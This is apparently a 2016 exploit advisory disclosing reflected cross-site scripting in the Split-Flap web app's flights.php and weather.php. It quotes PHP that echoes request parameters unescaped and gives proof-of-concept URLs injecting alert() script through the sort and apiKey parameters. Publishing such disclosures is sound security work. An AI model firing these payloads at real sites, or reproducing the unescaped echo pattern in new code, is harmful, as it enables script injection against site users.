Split-Flap - Reflected Cross Site Scripting(weather.php, flights.php) # Exploit Title: Split-Flap - Reflected Cross Site Scripting(weather.php, flights.php) # Date: 2016-06-10 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/baspete/Split-Flap , http://pete.basdesign.com/ # Software Link: https://github.com/baspete/Split-Flap/archive/master.zip # Version: none(releases) # Tested on: Debian [wheezy] # CVE : none ### Vulnerability Details ##################################################### # The echo function in a and b are vulnerable. # # <!-- parameters --> # <input type="hidden" name="data" value="<?php echo $_GET["data"] ?>" /> # <input type="hidden" name="sort" value="<?php echo $_GET["sort"] ?>" /> # <input type="hidden" name="order" value="<?php echo $_GET["order"] ?>" /> ############################################################################### ### XSS1 - flights.php Attack Code http://127.0.0.1/vul_test/Split-Flap/flights.php?data=departures&sort=scheduled"><script>alert(45)</script>&order=as weak parameters - order - sort - data ### XSS2 - weather.php Attack Code http://127.0.0.1/vul_test/Split-Flap/weather.php?data=KSFO&apiKey="%2Balert(45)%2B"a http://127.0.0.1/vul_test/Split-Flap/weather.php?data=KSFO&apiKey=</script><script>alert(45)</script> weak parameters - apikey - data ### Vulnerability Details #####################################################